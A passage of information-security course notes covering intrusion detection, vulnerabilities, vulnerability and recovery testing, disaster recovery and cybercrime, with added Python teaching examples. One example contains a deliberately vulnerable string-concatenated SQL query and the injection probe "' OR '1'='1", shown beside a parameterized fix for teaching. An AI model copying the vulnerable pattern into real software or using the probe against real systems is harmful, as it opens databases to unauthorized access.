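        Packet("10.0.2.5", "9.9.9.9", "udp", 53),          # workstation -> DNS: allow
    ]
    for pkt in samples:
        print(f"{pkt.src} -> {pkt.dst}:{pkt.dport}/{pkt.proto} => {filter_packet(RULES, pkt)}")
```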
vii) Intrusion Detection Systems

Another device that can be placed on the network for security purposes is an intrusion detection
system, or IDS. An IDS does not add any additional security; instead, it provides the
functionality to identify if the network is being attacked. An IDS can be configured to watch for
specific types of activities and then alert security personnel if that activity occurs.
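An added example, not from the notes, of the "watch for specific activities and alert" behaviour: a small Python detector that reads constructed authentication log lines and raises an alert when one source exceeds a threshold of failed logins inside a sliding time window, and a higher-severity alert when that source then logs in successfully. The log format, the threshold and the sample lines are assumptions made for illustration.

```python
"""Small signature-based intrusion detector run over sample log lines.
Added example, not from the original notes: the log format, threshold
and sample lines are constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed auth-log format: "<ISO timestamp> <result> user=<name> src=<ip>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<result>FAILED|ACCEPTED) user=(?P<user>\S+) src=(?P<src>\S+)$"
)

THRESHOLD = 5                    # this many failures ...
WINDOW = timedelta(seconds=60)   # ... within this window raises an alert


def parse_line(line: str) -> Tuple[datetime, str, str, str]:
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    return (datetime.fromisoformat(m["ts"]), m["result"], m["user"], m["src"])


def detect(lines: List[str]) -> List[str]:
    """Return one alert string per suspicious event, in log order."""
    failures: Dict[str, deque] = defaultdict(deque)  # src -> timestamps of recent failures
    flagged = set()                                   # sources already alerted on
    alerts: List[str] = []
    for line in lines:
        ts, result, user, src = parse_line(line)
        window = failures[src]
        # Drop failures older than WINDOW so the count is a sliding window, not a lifetime total.
        while window and ts - window[0] > WINDOW:
            window.popleft()
        if result == "FAILED":
            window.append(ts)
            if len(window) >= THRESHOLD and src not in flagged:
                flagged.add(src)
                alerts.append(f"{ts.isoformat()} BRUTE_FORCE src={src} failures={len(window)}")
        elif src in flagged:
            # A success right after a burst of failures is the event worth paging on.
            alerts.append(f"{ts.isoformat()} SUCCESS_AFTER_BRUTE_FORCE src={src} user={user}")
    return alerts


# Constructed sample log: one noisy external source and one normal user.
SAMPLE_LOG = [
    "2024-01-15T09:00:01 FAILED user=admin src=198.51.100.23",
    "2024-01-15T09:00:03 FAILED user=admin src=198.51.100.23",
    "2024-01-15T09:00:04 ACCEPTED user=alice src=10.0.2.17",
    "2024-01-15T09:00:05 FAILED user=root src=198.51.100.23",
    "2024-01-15T09:00:08 FAILED user=admin src=198.51.100.23",
    "2024-01-15T09:00:09 FAILED user=admin src=198.51.100.23",
    "2024-01-15T09:00:12 ACCEPTED user=admin src=198.51.100.23",
    "2024-01-15T09:05:00 FAILED user=alice src=10.0.2.17",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```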
viii) Sidebar: Virtual Private Networks

A VPN allows a user who is outside of a corporate network to take a detour around the firewall
and access the internal network from the outside. Through a combination of software and
security measures, this lets an organization allow limited access to its networks while at the same
time ensuring overall security.
Physical Security

Physical security is the protection of the actual hardware and networking components that store
and transmit information resources. To implement physical security, an organization must
identify all of the vulnerable resources and take measures to ensure that these resources cannot
be physically tampered with or stolen. These measures include the following.
• Locked doors: It may seem obvious, but all the security in the world is useless if an
intruder can simply walk in and physically remove a computing device. High-value
information assets should be secured in a location with limited access.
• Physical intrusion detection: High-value information assets should be monitored through
the use of security cameras and other means to detect unauthorized access to the physical
locations where they exist.
• Secured equipment: Devices should be locked down to prevent them from being stolen.
One employee’s hard drive could contain all of your customer information, so it is
essential that it be secured.
• Environmental monitoring: An organization’s servers and other high-value equipment
should always be kept in a room that is monitored for temperature, humidity, and airflow.
The risk of a server failure rises when these factors go out of a specified range.
• Employee training: One of the most common ways thieves steal corporate information is
to steal employee laptops while employees are traveling. Employees should be trained to
secure their equipment whenever they are away from the office.

Security Policies

Besides the technical controls listed above, organizations also need to implement security
policies as a form of administrative control. In fact, these policies should really be a starting
point in developing an overall security plan. A good information-security policy lays out the
guidelines for employee use of the information resources of the company and provides the
company recourse in the case that an employee violates a policy.
A security policy should be based on the guiding principles of confidentiality, integrity, and
availability.
A good example of a security policy that many will be familiar with is a web use policy. A web
use policy lays out the responsibilities of company employees as they use company resources to
access the Internet. A security policy should also address any governmental or industry
regulations that apply to the organization.

Cyber Security
Cyber security is a well-designed technique to protect computers, networks, different programs,
personal data, etc., from unauthorized access.
How to Secure Data?
Let us now discuss how to secure data. In order to make your security system strong, you need
to pay attention to the following −
• Security Architecture
• Network Diagram
• Security Assessment Procedure
• Security Policies
• Risk Management Policy
• Backup and Restore Procedures
• Disaster Recovery Plan
• Risk Assessment Procedures
Once you have a complete blueprint of the points mentioned above, you can put a better security
system in place for your data and can also retrieve your data if something goes wrong.

Information System Security


IS security refers to measures put in place to protect information system resources from
unauthorized access or being compromised. Security vulnerabilities are weaknesses in a
computer system, software, or hardware that can be exploited by the attacker to gain
unauthorized access or compromise a system.

Let's now look at some of the threats that information systems face.

Computer Viruses – these are malicious programs as described in the above section. The
threats posed by viruses can be eliminated or the impact minimized by using Anti-Virus software
and following laid down security best practices of an organization.

Unauthorized Access – the standard convention is to use a combination of a username and a
password. Hackers have learnt how to circumvent these controls if the user does not follow
security best practices. Most organizations have added the use of mobile devices such as phones
to provide an extra layer of security.

Data Loss – if the data center caught fire or was flooded, the hardware with the data can be
damaged, and the data on it will be lost. As a standard security best practice, most organizations
keep backups of the data at remote places. The backups are made periodically and are usually put
in more than one remote area.

Biometric Identification – this is now becoming very common especially with mobile devices
such as smartphones. The phone can record the user fingerprint and use it for authentication
purposes. This makes it harder for attackers to gain unauthorized access to the mobile device.
Such technology can also be used to stop unauthorized people from getting access to your
devices.

Hacking - Hacking refers to the misuse of devices like computers, smartphones, tablets, and
networks to cause damage to or corrupt systems, gather information on users, steal data and
documents, or disrupt data-related activity.

Definition: Hacking is an attempt to exploit a computer system or a private network inside a
computer. Simply put, it is the unauthorised access to or control over computer network security
systems for some illicit purpose.

Types of hackers
In general computer parlance, they are classified as white hat, black hat and grey hat hackers.
White hat hackers hack to check their own security systems to make them more hack-proof.
Black hat hackers hack to take control over the system for personal gain. They can destroy,
steal or even prevent authorized users from accessing the system.
Grey hat hackers are curious people who have just about enough computer language skills to
enable them to hack a system to locate potential loopholes.
What is Ethical Hacking?
Ethical Hacking is identifying weaknesses in computer systems and/or computer networks and
coming up with countermeasures that protect those weaknesses. Ethical hackers must abide by the
following rules.
• Get written permission from the owner of the computer system and/or computer
network before hacking.
• Protect the privacy of the organization being hacked.
• Transparently report all the identified weaknesses in the computer system to the
organization.
• Inform hardware and software vendors of the identified weaknesses.
Why Ethical Hacking?
• Information is one of the most valuable assets of an organization. Keeping information
secure can protect an organization’s image and save an organization a lot of money.
• Hacking can lead to loss of business for organizations that deal in finance such as PayPal.
Ethical hacking puts them a step ahead of the cyber criminals who would otherwise lead
to loss of business.
What is Security Testing?
Security testing is a testing technique to determine if an information system protects data and
maintains functionality as intended. It also aims at verifying 6 basic principles as listed below:
• Confidentiality
• Integrity
• Authentication
• Authorization
• Availability
• Non-repudiation

Security Testing is a type of Software Testing that uncovers vulnerabilities, threats and risks in a
software application and prevents malicious attacks from intruders. The purpose of security
tests is to identify all possible loopholes and weaknesses of the software system which might
result in a loss of information, revenue or reputation at the hands of employees or outsiders of the
organization.
The goal of security testing is to identify the threats in the system and measure its potential
vulnerabilities, so that the system does not stop functioning or get exploited. It also helps in
detecting all possible security risks in the system and helps developers fix these problems
through coding.
Types of Security Testing:
There are seven main types of security testing as per the Open Source Security Testing
Methodology Manual. They are explained as follows:
• Vulnerability Scanning: This is done through automated software that scans a system
against known vulnerability signatures.
• Security Scanning: It involves identifying network and system weaknesses, and later
provides solutions for reducing these risks. This scanning can be performed both
manually and with automated tools.
• Penetration testing: This kind of testing simulates an attack from a malicious hacker.
This testing involves analysis of a particular system to check for potential vulnerabilities
to an external hacking attempt.
• Risk Assessment: This testing involves analysis of security risks observed in the
organization. Risks are classified as Low, Medium and High. This testing recommends
controls and measures to reduce the risk.
• Security Auditing: This is an internal inspection of applications and operating systems
for security flaws. An audit can also be done via line-by-line inspection of code.
• Ethical hacking: This is hacking an organization's software systems. Unlike malicious
hackers, who steal for their own gains, the intent is to expose security flaws in the
system.
• Posture Assessment: This combines security scanning, ethical hacking and risk
assessment to show the overall security posture of an organization.
Vulnerability
Vulnerability is any mistakes or weakness in the system security procedures, design,
implementation or any internal control that may result in the violation of the system's security
policy.
A flaw or weakness in a system's design, implementation, or operation and management that
could be exploited to violate the system's security policy
Vulnerability—Weakness in an information system, system security procedures, internal
controls, or implementation that could be exploited by a threat source
Vulnerabilities are related to:
• physical environment of the system
• the personnel
• management
• administration procedures and security measures within the organization
• business operation and service delivery
• hardware
• software
• communication equipment and facilities
• peripheral devices
• their combinations.

It is evident that a purely technical approach cannot even protect physical assets: one should have
an administrative procedure to let maintenance personnel enter the facilities, and people with
adequate knowledge of the procedures, motivated to follow them with proper care.
Four examples of vulnerability exploits:
• an attacker finds and uses an overflow weakness to install malware to export sensitive data;
• an attacker convinces a user to open an email message with attached malware;
• an insider copies a hardened, encrypted program onto a thumb drive and cracks it at home;
• a flood damages one's computer systems installed at ground floor.
Classification of Vulnerabilities
Vulnerabilities are classified according to the asset class they are related to:

• hardware
o susceptibility to humidity
o susceptibility to dust
o susceptibility to soiling
o susceptibility to unprotected storage
• software
o insufficient testing
o lack of audit trail
o design flaw
• network
o unprotected communication lines
o insecure network architecture
• personnel
o inadequate recruiting process
o inadequate security awareness
• physical site
o area subject to flood
o unreliable power source
• organizational
o lack of regular audits
o lack of continuity plans
o lack of security
Causes of Vulnerability
• Complexity: Large, complex systems increase the probability of flaws and
unintended access points.
• Familiarity: Using common, well-known code, software, operating systems, and/or
hardware increases the probability an attacker has or can find the knowledge and tools to
exploit the flaw
• Connectivity: More physical connections, privileges, ports, protocols, and services and time
each of those are accessible increase vulnerability.
• Password management flaws: The computer user uses weak passwords that could be
discovered by brute force.[19] The computer user stores the password on the computer where
a program can access it. Users re-use passwords between many programs and websites.
• Fundamental operating system design flaws: The operating system designer chooses to
enforce suboptimal policies on user/program management. For example, operating systems
with policies such as default permit grant every program and every user full access to the
entire computer. This operating system flaw allows viruses and malware to execute
commands on behalf of the administrator.
• Internet Website Browsing: Some internet websites may contain
harmful Spyware or Adware that can be installed automatically on the computer systems.
After visiting those websites, the computer systems become infected and personal
information will be collected and passed on to third party individuals.
• Software bugs: The programmer leaves an exploitable bug in a software program. The
software bug may allow an attacker to misuse an application.
• Unchecked user input: The program assumes that all user input is safe. Programs that do
not check user input can allow unintended direct execution of commands or SQL statements
(known as Buffer overflows, SQL injection or other non-validated inputs).
• Not learning from past mistakes: for example, most vulnerabilities discovered
in IPv4 protocol software were rediscovered in the new IPv6 implementations.
Research has shown that the most vulnerable point in most information systems is the human
user, operator, designer, or other human: so humans should be considered in their different roles
as asset, threat and information resource.
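The unchecked-input cause above, shown as an added Python example (not from the notes): a lookup that concatenates user input into a SQL statement beside the parameterized version that sends the value separately from the query text. The customer table and its rows are constructed, and sqlite3 is used so it runs offline.

```python
"""Unchecked user input (SQL injection) beside the parameterized fix.
Added example, not from the original notes: the table, rows and lookup
functions are constructed for illustration."""
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed in-memory customer table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, email TEXT, plan TEXT)")
    conn.executemany(
        "INSERT INTO customers (email, plan) VALUES (?, ?)",
        [("alice@example.com", "gold"),
         ("bob@example.com", "silver"),
         ("carol@example.com", "gold")],
    )
    return conn


def find_customer_vulnerable(conn: sqlite3.Connection, email: str) -> List[Tuple]:
    """Builds the statement by string concatenation: the input is assumed safe,
    so a quote character in it becomes part of the SQL and changes the WHERE clause."""
    query = "SELECT id, email, plan FROM customers WHERE email = '" + email + "'"
    return conn.execute(query).fetchall()


def find_customer_safe(conn: sqlite3.Connection, email: str) -> List[Tuple]:
    """Bound parameter: the driver passes the value separately from the SQL text,
    so quotes or keywords in the input can never alter the statement's structure."""
    query = "SELECT id, email, plan FROM customers WHERE email = ?"
    return conn.execute(query, (email,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "' OR '1'='1"   # textbook probe string used in security testing
    print("vulnerable:", find_customer_vulnerable(db, probe))  # every row comes back
    print("safe:      ", find_customer_safe(db, probe))        # no row has that email
```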
What is Vulnerability Assessment / Testing?
Vulnerability Assessment is a process to evaluate the security risks in the software system in
order to reduce the probability of a threat. It is also called Vulnerability Testing.
The purpose of Vulnerability Assessment is to reduce the possibility for intruders (hackers) to
get unauthorized access.
How to do Vulnerability Testing
Following is the step by step Vulnerability Assessment Methodology / Technique:
Step 1) Setup:
• Begin Documentation
• Secure Permission
• Update Tools
• Configure Tools
Step 2) Test Execution:
• Run the Tools
• Process the captured data packets
Step 3) Vulnerability Analysis:
• Defining and classifying network or system resources.
• Assigning priority to the resources (e.g. High, Medium, Low).
• Identifying potential threats to each resource.
• Developing a strategy to deal with the highest-priority problems first.
• Defining and implementing ways to minimize the consequences if an attack occurs.
Step 4) Reporting
Step 5) Remediation:
• The process of fixing the vulnerabilities.
• For every vulnerability

Advantages of Vulnerability Assessment
• Open Source tools are available.
• Identifies almost all vulnerabilities.
• Automated for scanning.
• Easy to run on a regular basis.

Disadvantages of Vulnerability Assessment
• High false positive rate.
• Can easily be detected by an Intrusion Detection System or firewall.
• Often fails to notice the latest vulnerabilities.
Vulnerability Testing Methods
Active Testing
• In active testing, a tester introduces new test data and analyzes the results.
• During the testing process, the testers create a mental model of the process, and it will
grow further during the interaction with the software under test.
• While doing the test, the tester is actively involved in the process of finding new
test cases and new ideas. That's why it is called active testing.
Passive Testing
• In passive testing, the tester monitors the result of running the software under test without
introducing new test cases or data.
Network Testing
• Network testing is the process of measuring and recording the current state of network
operation over a period of time.
• Testing is mainly done to predict how the network will operate under load or to find out the
problems created by new services.
• We need to test the following network characteristics:
• Utilization levels
• Number of users
• Application utilization
Distributed Testing
• Distributed Tests are applied for testing distributed applications, which means, the
applications that are working with multiple clients simultaneously. Basically, testing a
distributed application means testing its client and server parts separately, but by using a
distributed testing method, we can test them all together.
• The test parts will interact with each other during the Test Run. This makes them
synchronized in an appropriate manner. Synchronization is one of the most crucial points
in distributed testing.
Disaster Management
Disaster Management is a strategic planning and procedure that is administered and employed to
protect critical infrastructures (also known as "critical assets") from severe damage when
natural or human-made calamities and catastrophic events occur.
Disaster management plans are multi-layered and are aimed to address such issues as floods,
hurricanes, fires, bombings, and even mass failures of utilities or the rapid spread of disease.
Though vulnerability to disaster varies, there are four main types of disaster:
• Natural disasters. These disasters include floods, hurricanes, earthquakes and volcano
eruptions that can have immediate impacts on human health, as well as secondary
impacts causing further death and suffering from floods causing landslides, earthquakes
resulting in fires, tsunamis causing widespread flooding and typhoons sinking ferries
• Environmental emergencies. These emergencies include technological or industrial
accidents, usually involving hazardous material, and occur where these materials are
produced, used or transported. Large forest fires are generally included in this definition
because they tend to be caused by humans.
• Complex emergencies. These emergencies involve a break-down of authority, looting
and attacks on strategic installations. Complex emergencies include conflict situations
and war.
• Pandemic emergencies. These emergencies involve a sudden onset of a contagious
disease that affects health but also disrupts services and businesses, bringing economic
and social costs.
Emergency Management
Emergency Management is the generic name of an interdisciplinary field dealing with the
strategic organizational management processes used to protect the assets of an organization from
hazard risks that can cause disasters or catastrophes, and to ensure the continuance of the
organization within its planned lifetime.
Emergency Management is a systematic process leading to action before, during and after a
disaster to save lives and prevent injury.
"Disaster" here means a major emergency that exceeds the community's capacity to respond
successfully with its own resources.
Emergency Management is organized into four phases:
• Mitigation: actions taken to eliminate a hazard or reduce its potential impact.
• Preparedness: planning for major emergencies, including training and exercises.
• Response: actions taken in response to emergencies.
• Recovery: actions taken after a disaster to restore services and reconstruct communities.
Resilience and Prevention
Resilience defines the capability to recover from catastrophe or misfortune. Prevention is totally
avoiding danger or risky events.
Mitigation
Mitigation is the effort to reduce loss of life and property by lessening the impact of disasters.
Preparedness
Preparedness is a way of mitigating unwanted outcomes, and it is one of the crucial actions in
achieving safety and security in the event of calamities, disasters, and terrorism.
Response
An emergency response plan must provide the resources and information needed to evaluate the
human and environmental health impacts of the event, assess and reduce human exposures to
contaminants, and develop science-based strategies for remediation and rebuilding.
Recovery
Recovery efforts are primarily concerned with actions that involve rebuilding destroyed property,
re-employment, and the repair of other essential infrastructure.
Disaster Recovery
Disaster recovery is generally a planning process, and it produces a document that enables
businesses to handle critical events that affect their activities. Such events can be a natural
disaster (earthquakes, floods, etc.), a cyber-attack or a hardware failure such as a server or router.
Having such a document in place will reduce the downtime of business processes from the
technology and infrastructure side. This document is generally combined with the Business
Continuity Plan, which analyzes all the processes and prioritizes them according to their
importance to the business. In case of a massive disruption it shows which process should
be recovered first and what the acceptable downtime is. It also minimizes application service
interruption. It helps us to recover data in an organized process and helps the staff to have a
clear view of what should be done in case of a disaster.
Requirements to Have a Disaster Recovery Plan
Disaster recovery starts with an inventory of all assets like computers, network equipment,
server, etc. and it is recommended to register by serial numbers too. We should make an
inventory of all the software and prioritize them according to business importance.
An example is shown in the following table −

Systems        | Down Time | Disaster type  | Preventions          | Solution strategy                        | Recover fully
Payroll system | 8 hours   | Server damaged | We take backup daily | Restore the backups in the Backup Server | Fix the primary server and restore up to date data

You should prepare a list of all contacts of your partners and service providers, such as ISP contact
details, and of the licenses you have purchased and where they were purchased. Document your
entire network, including IP schemas and the usernames and passwords of servers.
Preventive steps to be taken for Disaster Recovery
• The server room should have an authorization level. For example: only IT personnel should
enter at any given point of time.
• In the server room there should be a fire alarm, humidity sensor, flood sensor and a
temperature sensor.
• At the server level, RAID systems should always be used and there should always be a spare
Hard Disk in the server room.
• You should have backups in place, this is generally recommended for local and off-site
backup, so a NAS should be in your server room.
• Backup should be done periodically.
• The connectivity to internet is another issue and it is recommended that the headquarters
should have one or more internet lines. One primary and one secondary with a device that
offers redundancy.
• If you are an enterprise, you should have a disaster recovery site, which is generally located
outside the city of the main site. Its main purpose is to act as a standby: in case of a
disaster, it replicates and backs up the data.
What is Recovery Testing?
Recovery testing verifies the system's ability to recover from points of failure such as
software or hardware crashes and network failures. Its purpose is to determine whether
operations can be continued after a disaster, or after the integrity of the system has been
lost. It involves reverting to a point where the integrity of the system was known to be good
and then reprocessing the transactions up to the point of failure.
Recovery Testing Example
• While an application is receiving data from the network, unplug the connecting cable. After
some time, plug the cable back in and check whether the application can continue receiving
data from the point at which the network connection was broken.
• Restart the system while a browser has a definite number of sessions open and check
whether the browser is able to recover all of them or not.
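The "revert to a known-good point, then reprocess transactions up to the failure" idea can be exercised in code. The following is an added example written for these notes, not code from the original page: a hypothetical key-value store that writes every update to a journal before applying it, takes a checkpoint, and after a simulated crash (a half-written journal record) rebuilds its state from the checkpoint plus the complete journal records. The store, file names and the "balance" data are all constructed for the demonstration.

```python
"""Checkpoint + write-ahead journal recovery, as a runnable model of
"revert to a known-good point, then reprocess transactions up to the failure".
Added example; hypothetical key-value store, not code from these notes."""
import json
import os
import tempfile


class JournaledStore:
    """Tiny key-value store: every update is appended to a journal file
    before it is applied in memory; a checkpoint writes the full state and
    truncates the journal. Recovery = load checkpoint, replay journal."""

    def __init__(self, workdir):
        self.checkpoint_path = os.path.join(workdir, "checkpoint.json")
        self.journal_path = os.path.join(workdir, "journal.log")
        self.data = {}
        self.replayed = 0
        self.recover()

    def apply(self, entry):
        if entry["op"] == "set":
            self.data[entry["key"]] = entry["value"]
        elif entry["op"] == "del":
            self.data.pop(entry["key"], None)

    def write(self, op, key, value=None):
        entry = {"op": op, "key": key, "value": value}
        # Write-ahead: the journal record is durable before memory changes.
        with open(self.journal_path, "a", encoding="utf-8") as fh:
            fh.write(json.dumps(entry) + "\n")
            fh.flush()
            os.fsync(fh.fileno())
        self.apply(entry)

    def checkpoint(self):
        """Known-good point: full state written atomically, journal emptied."""
        tmp = self.checkpoint_path + ".tmp"
        with open(tmp, "w", encoding="utf-8") as fh:
            json.dump(self.data, fh)
            fh.flush()
            os.fsync(fh.fileno())
        os.replace(tmp, self.checkpoint_path)  # atomic: old or new, never half
        open(self.journal_path, "w").close()   # journal now empty

    def recover(self):
        """Rebuild state: last good checkpoint, then replay the journal.
        A torn final record (crash mid-write) is ignored rather than trusted."""
        self.data = {}
        self.replayed = 0
        if os.path.exists(self.checkpoint_path):
            with open(self.checkpoint_path, encoding="utf-8") as fh:
                self.data = json.load(fh)
        if os.path.exists(self.journal_path):
            with open(self.journal_path, encoding="utf-8") as fh:
                for line in fh:
                    try:
                        entry = json.loads(line)
                    except json.JSONDecodeError:
                        break  # partial record from the crash; stop here
                    self.apply(entry)
                    self.replayed += 1


def simulate_crash_and_recover():
    """Constructed scenario: checkpoint, three more updates, a crash that
    leaves a torn journal record, then recovery on a fresh instance."""
    workdir = tempfile.mkdtemp()
    store = JournaledStore(workdir)
    store.write("set", "balance:alice", 100)
    store.write("set", "balance:bob", 50)
    store.checkpoint()                       # known-good point
    store.write("set", "balance:alice", 70)  # transactions after checkpoint
    store.write("set", "balance:bob", 80)
    store.write("del", "balance:bob")
    # Simulate the crash: a record that only got half way to disk.
    with open(store.journal_path, "a", encoding="utf-8") as fh:
        fh.write('{"op": "set", "key": "balance:carol", "va')
    recovered = JournaledStore(workdir)      # recovery happens in __init__
    return recovered.data, recovered.replayed


if __name__ == "__main__":
    data, replayed = simulate_crash_and_recover()
    print(f"replayed {replayed} journal records -> {data}")
```

The recovered state is exactly what the three complete transactions after the checkpoint produce; the torn fourth record is discarded instead of being half-applied. A recovery test for a real system asks the same questions: is the checkpoint written atomically, is every accepted transaction durable before it is acknowledged, and does replay stop cleanly at the point of failure.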
In software engineering, recoverability testing is a type of non-functional testing. (Non-
functional testing covers aspects of the software that are not tied to a specific function
or user action, such as scalability or security.)
The time taken to recover depends upon:
• The number of restart points
• The volume of the applications and data to be restored
• The training and skills of the people conducting the recovery activities, and the tools
available for recovery.
When there are a number of possible failures, rather than trying to cover all of them at once,
recovery testing should be done in a structured fashion: one segment is tested, then the next.
It is done by professional testers. Before recovery testing, adequate backup data is kept in
secure locations, so that the operation can be continued even after a disaster.
Life Cycle of Recovery Process
The life cycle of the recovery process can be classified into the following five steps:

1. Normal operation
2. Disaster occurrence
3. Disruption and failure of the operation
4. Disaster clearance through the recovery process
5. Reconstruction of all processes and information to bring the whole system back to normal
operation

Let’s discuss these 5 steps in detail-


1. A system consisting of hardware, software and firmware, integrated to achieve a common
goal, is made operational to carry out a well-defined and stated goal. The system is said to
be in normal operation when it carries out its designed job without any disruption within
the stipulated time.
2. A disruption may occur due to a malfunction of the software, for various reasons: an
input-initiated malfunction, software crashing due to hardware failure, or damage due to
fire, theft or strike.
3. The disruption phase is the most painful phase. It leads to business losses, broken
relationships, lost opportunities, lost man-hours, and invariably financial and goodwill
losses. Every sensible agency should have a disaster recovery plan so that the disruption
phase is kept minimal.
4. If a backup plan and risk mitigation processes are in place before the disaster and
disruption are encountered, recovery can be done without much loss of time, effort and
energy. A designated individual and a team, with the role of each person defined, fix
responsibility and help the organization avoid a long disruption period.
5. Reconstruction may involve multiple sessions of work to rebuild all folders along with
configuration files. There should be proper documentation and a documented process of
reconstruction for correct recovery.
Restoration Strategy
The recovery team should have its own strategy for retrieving the important code and data to
bring the operation of the agency back to normal.
The strategy can be unique to each organization, based on the criticality of the systems it
handles.
The possible choices for critical systems are:
1. Whether to have a single backup or more than one
2. Whether to keep multiple backups at one place or at different places
3. Whether to use online backup or offline backup
4. Whether backups are taken automatically according to a policy, or manually
5. Whether to have an independent restoration team, or to use the development team itself for
the work
Each of these choices has a cost factor associated with it: multiple backups need more physical
resources, and an independent team needs its own staff.
Many companies may be affected because their data and code depend on a third-party provider.
For instance, when a major cloud provider such as Amazon AWS has an outage, a large share of the
sites and services built on it go down with it. Independent restoration capability is crucial
in such cases.
How to do Recovery Testing
While performing recovery testing, the following things should be considered.
• Create a test bed as close to the actual conditions of deployment as possible. Interfaces,
protocols, firmware, hardware and software should be as close to the actual condition as
possible, if not identical.
• Though exhaustive testing may be time-consuming and costly, an identical configuration
should be used and a complete check performed.
• If possible, testing should be performed on the hardware you are finally going to restore
to. This is especially true if you are restoring to a different machine than the one that
created the backup.
• Some backup systems expect the hard drive to be exactly the same size as the one the
backup was taken from.
• Obsolescence should be managed: drive technology advances quickly and an old drive may not
be compatible with a new one. One way to handle the problem is to restore to a virtual
machine. Virtualization software vendors such as VMware Inc. can configure virtual machines
to mimic existing hardware, including disk sizes and other configuration.
• Online backup systems are not an exception. Most online backup service providers protect us
from being directly exposed to media problems by using fault-tolerant storage systems.
• Even though online backup systems are very reliable, the restore side of the system must be
tested to make sure there are no problems with the retrieval functionality, security or
encryption (for example, that the decryption keys are available to the recovery team and not
only to the person who set the service up).
Testing procedure after restoration
Most large corporations have independent auditors perform recovery test exercises
periodically.
The expense of maintaining and testing a comprehensive disaster recovery plan can be
substantial, and it may be prohibitive for smaller businesses.
Smaller businesses may rely on their data backups and off-site storage plans to save them in
the case of a catastrophe.
After folders and files are restored, the following checks can be done to make sure that the
files were recovered properly:
• Rename the corrupted document folder rather than deleting it, so the restored copy can be
compared with it.
• Count the files in the restored folders and match the count with the existing folder.
• Open a few of the files and make sure they are accessible. Open them with the application
that normally uses them, and make sure you can browse the data, update the data, or do
whatever you normally do.
• It is best to open several files of different types (pictures, mp3s, documents), some large
and some small.
• Most operating systems have utilities you can use to compare files and directories (for
example diff -r on Linux or fc on Windows); comparing a checksum of every file is more
reliable than comparing counts alone.
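The file-count and file-comparison checks above can be automated so that every restore rehearsal (and every real restore) gets the same verdict. The following is an added example written for these notes, not code from the original page: a SHA-256 manifest is built from the source tree before the backup, and the restored tree is checked against it for missing files, unexpected extra files and files whose contents changed. The "payroll" files and the deliberately imperfect restore are constructed in temporary directories.

```python
"""Post-restore verification: build a SHA-256 manifest of the source tree,
then check the restored tree against it (file count, missing/extra files,
content mismatches). Added example, not from the notes; the sample trees
below are constructed in temporary directories."""
import hashlib
import os
import tempfile


def build_manifest(root):
    """Map relative path -> sha256 hex digest for every regular file under root."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 16), b""):
                    digest.update(chunk)
            manifest[rel] = digest.hexdigest()
    return manifest


def verify_restore(manifest, restored_root):
    """Compare a restored tree with the manifest taken before backup.
    'ok' is True only when every file is back, byte-identical, with nothing extra."""
    restored = build_manifest(restored_root)
    missing = sorted(set(manifest) - set(restored))
    extra = sorted(set(restored) - set(manifest))
    mismatched = sorted(p for p in manifest
                        if p in restored and restored[p] != manifest[p])
    return {
        "expected_count": len(manifest),
        "restored_count": len(restored),
        "missing": missing,
        "extra": extra,
        "mismatched": mismatched,
        "ok": not (missing or extra or mismatched),
    }


def _write(root, rel, data):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)


def demo():
    """Constructed scenario: a small 'payroll' tree, then a restore that
    silently lost one file, truncated another, and picked up a stray file.
    A plain file count (3 vs 3) would have called this restore a success."""
    src = tempfile.mkdtemp(prefix="src_")
    dst = tempfile.mkdtemp(prefix="restored_")
    files = {
        "payroll/2024-03.csv": b"emp,amount\n101,5200\n102,4800\n",
        "payroll/2024-04.csv": b"emp,amount\n101,5200\n102,4900\n",
        "config/app.ini": b"[db]\nhost=payroll-db\n",
    }
    for rel, data in files.items():
        _write(src, rel, data)
    manifest = build_manifest(src)          # taken BEFORE the backup runs

    _write(dst, "payroll/2024-03.csv", files["payroll/2024-03.csv"])  # intact
    _write(dst, "config/app.ini", files["config/app.ini"][:10])       # truncated
    _write(dst, "payroll/.DS_Store", b"junk")                          # stray
    return verify_restore(manifest, dst)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The manifest should be written at backup time and stored with the backup (and a copy elsewhere), because a restored tree can only be judged against a record made before the damage. Note that the file counts match in the scenario, which is exactly why a count alone is not enough.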
Computer Crimes
Computer crime, or cybercrime, is an unlawful act against a person or organization that
involves computers, their systems, and their online or offline applications. It occurs when
information technology is used to commit or to cover up an offense. An act is only considered
cybercrime if it is intentional and not accidental.
What is Cybercrime?
Cyber-crime is the use of computers and networks to perform illegal activities such as spreading
computer viruses, online bullying, performing unauthorized electronic fund transfers, etc. Most
cybercrimes are committed through the internet. Some cybercrimes can also be carried out
using Mobile phones via SMS and online chatting applications.
Examples of Cybercrime
The following list presents the common types of cybercrimes:
• Computer Fraud: Intentional deception for personal gain through the use of computer systems.
• Privacy violation: Exposing personal information such as email addresses, phone numbers,
account details, etc. on social media, websites, etc.
• Identity Theft: Stealing someone's personal information and impersonating that person.
• Sharing copyrighted files/information: Distributing copyright-protected files such as
eBooks and computer programs.
• Electronic funds transfer fraud: Gaining unauthorized access to bank computer networks and
making illegal fund transfers.
• Electronic money laundering: Using computers to launder money.
• ATM Fraud: Intercepting ATM card details such as the account number and PIN (for example
with a skimmer fitted to the card slot). These details are then used to withdraw funds from
the compromised accounts.
• Denial of Service Attacks: Using computers in multiple locations to flood servers with
traffic, with the aim of shutting them down.
• Spam: Sending unsolicited bulk email. These emails usually contain advertisements and are
often used to deliver phishing links or malware.
Types of Cybercrime
Let us now discuss the major types of cybercrime −
1) Hacking
In this context, hacking is the act of breaching the security of someone else's computer
system without authorization, for personal interest or gain.
